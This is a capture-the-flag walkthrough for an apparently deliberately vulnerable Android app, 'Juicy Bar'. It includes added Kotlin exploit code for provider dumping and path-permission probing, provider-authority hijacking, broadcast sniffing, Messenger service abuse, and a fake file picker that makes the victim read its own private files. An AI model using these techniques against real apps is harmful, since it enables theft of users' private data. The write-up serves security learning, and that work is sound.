Juicy Bar CTF - Tools and APIs
In this post, we’ll walk through the solutions for all of the Tools and APIs challenges.
Captain’s Log
1 - Description
2 - Obtaining Flag
The first question was the easiest. Logging was left enabled, so when I opened the activity, I could see the flag directly in Logcat.
Time Travel
1 - Description
2 - Obtaining Flag
The Time Travel challenge requires us to change the device’s date and time. By reversing the APK using JADX, we can find the expected timestamp. Once we set the correct date and time, the flag is revealed.
Export Duty
1 - Description
2 - Obtaining Flag
The Export Duty challenge was straightforward: we just needed to launch the exported target activity with an explicit intent to retrieve the flag.
Content Providers
1 - Description
To query the content provider, we first needed to add the appropriate
2 - Obtaining 1st Flag
The first flag in the Content Providers challenge was easy to obtain—simply querying the provider was enough to retrieve it.
3 - Obtaining 2nd Flag
The second flag was protected by path permissions, so I slightly modified the code to bypass the restriction and successfully retrieved the flag.
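The query step, as an added example in Kotlin for the attacker app (this is not the post’s own code, and the post does not show which path change defeated the `<path-permission>` for the second flag, so that is left to the caller: the function takes any URI you want to try). The authority and path are assumptions; take the real ones from the target’s AndroidManifest.xml in JADX.

```kotlin
// Added example, not the original post's code. Authority and paths are
// assumptions; read them from the target's manifest and provider class in JADX.
package com.example.ctfclient

import android.content.Context
import android.database.Cursor
import android.net.Uri
import android.util.Log

private const val TAG = "JuicyBarCP"

/** Queries [uri] and returns every row as a column-name -> value map, logging as it goes. */
fun dumpProvider(context: Context, uri: Uri): List<Map<String, String?>> {
    val rows = mutableListOf<Map<String, String?>>()
    val cursor: Cursor? = try {
        context.contentResolver.query(uri, null, null, null, null)
    } catch (e: SecurityException) {
        // This is what a <path-permission> (or provider-level permission) we do not
        // hold looks like from the caller's side: the query never reaches the provider.
        Log.e(TAG, "query denied for $uri: ${e.message}")
        return rows
    }
    if (cursor == null) {
        Log.w(TAG, "no provider handled $uri")
        return rows
    }
    cursor.use { c ->
        while (c.moveToNext()) {
            val row = (0 until c.columnCount).associate { i ->
                val value = if (c.getType(i) == Cursor.FIELD_TYPE_BLOB)
                    "<blob ${c.getBlob(i).size} bytes>"
                else
                    c.getString(i)
                c.getColumnName(i) to value
            }
            Log.d(TAG, "$uri -> $row")
            rows += row
        }
    }
    return rows
}

// Usage from an Activity in the attacker app (authority and path assumed):
// val authority = "com.example.juicybar.provider"
// dumpProvider(this, Uri.parse("content://$authority/flag"))
// For the second flag, keep calling dumpProvider with variants of the protected
// path until the SecurityException stops and rows come back.
```

If the call returns null rather than throwing on Android 11 or later, the target may simply not be visible to your app; a `<queries>` element naming the target package in your manifest is the usual fix.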
4 - Obtaining 3rd Flag
The third flag involved hijacking a content provider. I wrote a script to mimic the provider, and when the target attempted to insert the flag, my script successfully captured it.
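The hijacking provider, as an added example (not the script from the post). It registers the target’s authority in the attacker app and records whatever the target inserts. The authority name is an assumption. One constraint to be aware of: Android refuses to install a second app that declares an authority already registered on the device, so this only works when the attacker app is installed first or the target relies on an authority it does not declare itself.

```kotlin
// Added example, not the original post's code. The authority is an assumption.
package com.example.ctfclient

import android.content.ContentProvider
import android.content.ContentValues
import android.database.Cursor
import android.database.MatrixCursor
import android.net.Uri
import android.util.Log

// Manifest entry for this class (authority assumed):
//   <provider android:name=".CaptureProvider"
//             android:authorities="com.example.juicybar.provider"
//             android:exported="true" />
class CaptureProvider : ContentProvider() {
    companion object {
        private const val TAG = "JuicyBarCapture"
        // Everything inserted so far, so an Activity can show it on screen.
        val captured = mutableListOf<Pair<Uri, Map<String, Any?>>>()
    }

    override fun onCreate(): Boolean = true

    /** The target's insert() lands here; log and keep every column it sends. */
    override fun insert(uri: Uri, values: ContentValues?): Uri? {
        val map = values?.keySet()?.associateWith { values.get(it) } ?: emptyMap()
        Log.i(TAG, "insert on $uri from ${callingPackage}: $map")
        captured += uri to map
        // Return a plausible row URI so the caller believes the insert succeeded.
        return Uri.withAppendedPath(uri, captured.size.toString())
    }

    // Answer queries with an empty cursor instead of crashing the caller.
    override fun query(
        uri: Uri, projection: Array<String>?, selection: String?,
        selectionArgs: Array<String>?, sortOrder: String?
    ): Cursor = MatrixCursor(projection ?: arrayOf("_id"))

    override fun update(
        uri: Uri, values: ContentValues?, selection: String?, selectionArgs: Array<String>?
    ): Int = 0

    override fun delete(uri: Uri, selection: String?, selectionArgs: Array<String>?): Int = 0

    override fun getType(uri: Uri): String? = null
}
```

Watch Logcat filtered on `JuicyBarCapture` while triggering the target’s insert; `callingPackage` confirms the write really came from the target and not from your own test code.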
Juicy Broadcasts
1 - Description
2 - Obtaining 1st Flag
The first Broadcast Receivers challenge was straightforward: set the correct action and data, send the broadcast, and receive the flag.
3 - Obtaining 2nd Flag
The second challenge was a bit trickier. It required sending an ordered broadcast (sendOrderedBroadcast) whose resultExtras included a Boolean value.
4 - Obtaining 3rd Flag
The third flag was obtained by creating a fake receiver with the intended action, which allowed me to capture the flag.
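All three broadcast flags in one added Kotlin example (not the post’s code): a plain broadcast with action and data for the first, an ordered broadcast carrying a Boolean in the result extras for the second, and a receiver for the target’s own action for the third. Package, action, scheme and extra-key names are assumptions to be replaced with what JADX shows; the dynamic registration helper assumes the androidx.core library.

```kotlin
// Added example, not the original post's code. All names below are assumptions.
package com.example.ctfclient

import android.content.BroadcastReceiver
import android.content.Context
import android.content.Intent
import android.content.IntentFilter
import android.net.Uri
import android.os.Bundle
import android.util.Log
import androidx.core.content.ContextCompat

private const val TAG = "JuicyBarBcast"
private const val TARGET_PKG = "com.example.juicybar"                  // assumed
private const val ACTION_FLAG1 = "com.example.juicybar.GET_FLAG"       // assumed
private const val ACTION_FLAG2 = "com.example.juicybar.ORDERED_FLAG"   // assumed
private const val ACTION_FLAG3 = "com.example.juicybar.FLAG_BROADCAST" // assumed

/** Flag 1: plain broadcast with the expected action and data URI. */
fun sendFlag1(context: Context) {
    val intent = Intent(ACTION_FLAG1).apply {
        data = Uri.parse("juicy://flag")   // assumed scheme/path
        // Explicit package: since Android 8 an implicit broadcast is not
        // delivered to manifest-declared receivers in other apps.
        setPackage(TARGET_PKG)
    }
    context.sendBroadcast(intent)
}

/** Flag 2: ordered broadcast; the Boolean travels in the initial result extras. */
fun sendFlag2(context: Context, onFlag: (String?) -> Unit) {
    val intent = Intent(ACTION_FLAG2).setPackage(TARGET_PKG)
    val initialExtras = Bundle().apply { putBoolean("verified", true) } // assumed key
    val resultReceiver = object : BroadcastReceiver() {
        override fun onReceive(ctx: Context, i: Intent) {
            // The target's receiver answers via setResultData and/or setResultExtras.
            val fromExtras = getResultExtras(false)?.getString("flag") // assumed key
            Log.i(TAG, "ordered result: data=$resultData extras=${getResultExtras(false)}")
            onFlag(resultData ?: fromExtras)
        }
    }
    context.sendOrderedBroadcast(intent, null, resultReceiver, null, 0, null, initialExtras)
}

/** Flag 3: a receiver listening for the action the target broadcasts the flag on. */
// Manifest entry (action assumed):
//   <receiver android:name=".FlagSniffer" android:exported="true">
//     <intent-filter><action android:name="com.example.juicybar.FLAG_BROADCAST" /></intent-filter>
//   </receiver>
class FlagSniffer : BroadcastReceiver() {
    override fun onReceive(context: Context, intent: Intent) {
        val extras = intent.extras
        val dump = extras?.keySet()?.associateWith { extras.get(it) }
        Log.i(TAG, "captured ${intent.action}: data=${intent.dataString} extras=$dump")
    }
}

/**
 * If the target sends an implicit broadcast, a manifest receiver never sees it on
 * Android 8+; register from a running component instead (androidx.core assumed).
 */
fun registerSniffer(context: Context): BroadcastReceiver {
    val receiver = FlagSniffer()
    ContextCompat.registerReceiver(
        context, receiver, IntentFilter(ACTION_FLAG3), ContextCompat.RECEIVER_EXPORTED
    )
    return receiver
}
```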
At Your Service
1 - Description
2 - Obtaining 1st Flag
The first Service challenge was tough. I created a message handler and sent a message with the specific what value to get the flag.
3 - Obtaining 2nd Flag
The second challenge was even harder. I set the replyTo value to receive a response from the target’s message handler and extracted the flag from the extra data.
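Both service flags in one added Kotlin example (not the post’s code): bind to the target’s Messenger-based service, send a Message whose `what` matches the handler’s case, and set `replyTo` so the target’s reply lands in our own handler, where the flag is read out of the message’s data Bundle. Package, service class, `what` value and extra key are assumptions to be replaced from JADX.

```kotlin
// Added example, not the original post's code. Names and the 'what' value are assumptions.
package com.example.ctfclient

import android.content.ComponentName
import android.content.Context
import android.content.Intent
import android.content.ServiceConnection
import android.os.Handler
import android.os.IBinder
import android.os.Looper
import android.os.Message
import android.os.Messenger
import android.util.Log

private const val TAG = "JuicyBarSvc"
private const val TARGET_PKG = "com.example.juicybar"                // assumed
private const val TARGET_SERVICE = "com.example.juicybar.FlagService" // assumed
private const val MSG_GET_FLAG = 1                                    // assumed: the 'what' the handler switches on

class FlagServiceClient(private val context: Context, private val onFlag: (String?) -> Unit) {

    // Flag 2: whatever the target sends to msg.replyTo arrives here.
    private val replyHandler = Handler(Looper.getMainLooper()) { msg ->
        val data = msg.data // never null: getData() creates an empty Bundle
        val dump = data.keySet().associateWith { data.get(it) }
        Log.i(TAG, "reply what=${msg.what} arg1=${msg.arg1} data=$dump")
        onFlag(data.getString("flag")) // assumed extra key; check the dump if null
        true
    }
    private val replyMessenger = Messenger(replyHandler)

    private val connection = object : ServiceConnection {
        override fun onServiceConnected(name: ComponentName, binder: IBinder) {
            val service = Messenger(binder)
            // Flag 1: a Message with the specific 'what' the target's handler expects.
            val msg = Message.obtain(null, MSG_GET_FLAG).apply {
                replyTo = replyMessenger // without this the target has nowhere to answer
            }
            service.send(msg)
        }

        override fun onServiceDisconnected(name: ComponentName) {
            Log.w(TAG, "service disconnected")
        }
    }

    /** Explicit intent: bindService requires one on Android 5+. */
    fun start() {
        val intent = Intent().setClassName(TARGET_PKG, TARGET_SERVICE)
        val bound = context.bindService(intent, connection, Context.BIND_AUTO_CREATE)
        if (!bound) Log.e(TAG, "bindService failed: service missing or not exported")
    }

    fun stop() = context.unbindService(connection)
}

// Usage from an Activity:
// FlagServiceClient(this) { flag -> Log.i("JuicyBarSvc", "flag=$flag") }.start()
```

If the first flag only shows up in Logcat rather than in a reply, that is expected: the target’s handler may log or toast it when it sees the right `what` without ever using `replyTo`.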
Sign Here
1 - Description
2 - Obtaining Flag
The Sign Here challenge was very difficult. When I tried to access the content provider, I got an error saying I needed to sign the app with the correct key. After checking the hints, I discovered the APK was signed with a test key commonly found on AOSP. I then exported the APK, re-signed it using apksigner with the test keys, and was finally able to access the provider and retrieve the flag.
Data Exfiltration
1 - Description
2 - Obtaining Flag
The final challenge, Data Exfiltration, was the hardest. The app had a “Share File” feature that launched a file picker, listing applications like the Gallery. To exploit this, I needed to fake a file picker and trick the app into reading a sensitive file. I defined a custom activity in my manifest to act as a file picker:
Then, in PickerActivity, I crafted a fake URI pointing to the target file:
When I selected my app from the file picker list, it returned the malicious URI. The vulnerable app then attempted to read the file at that location—revealing the flag.
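The fake picker, as an added Kotlin example (not the post’s own PickerActivity or manifest). It assumes the victim launches the picker with ACTION_GET_CONTENT, which is the intent a chooser listing the Gallery normally resolves, and that the flag lives at an assumed path in the victim’s private data directory; the intent-filter in the comment is what a file picker usually advertises.

```kotlin
// Added example, not the original post's code. The target path and package are assumptions.
package com.example.ctfclient

import android.app.Activity
import android.content.Intent
import android.net.Uri
import android.os.Bundle
import java.io.File

// Manifest entry that gets this activity listed in the victim's picker (assumed mime type):
//   <activity android:name=".PickerActivity" android:exported="true">
//     <intent-filter>
//       <action android:name="android.intent.action.GET_CONTENT" />
//       <category android:name="android.intent.category.DEFAULT" />
//       <category android:name="android.intent.category.OPENABLE" />
//       <data android:mimeType="*/*" />
//     </intent-filter>
//   </activity>
class PickerActivity : Activity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        // Nothing to show: answer immediately with the URI we want the victim to open.
        setResult(RESULT_OK, buildResult())
        finish()
    }

    /**
     * The victim resolves the returned URI with its own identity, so a file inside its
     * private directory (assumed name and path) is readable by it even though it is not
     * readable by us. ContentResolver.openInputStream accepts file:// URIs.
     */
    private fun buildResult(): Intent {
        val target = File("/data/data/com.example.juicybar/shared_prefs/flag.xml") // assumed
        return Intent().apply {
            data = Uri.fromFile(target)
            // If the victim checks the mime type before reading, advertise something generic.
            type = "*/*"
        }
    }
}
```

The same trick works against any app that passes a picker result straight to `openInputStream` without checking the URI’s scheme or authority; the fix on the victim side is to accept only `content://` URIs from the system document provider, or to open the picker with ACTION_OPEN_DOCUMENT, which only the system DocumentsUI handles.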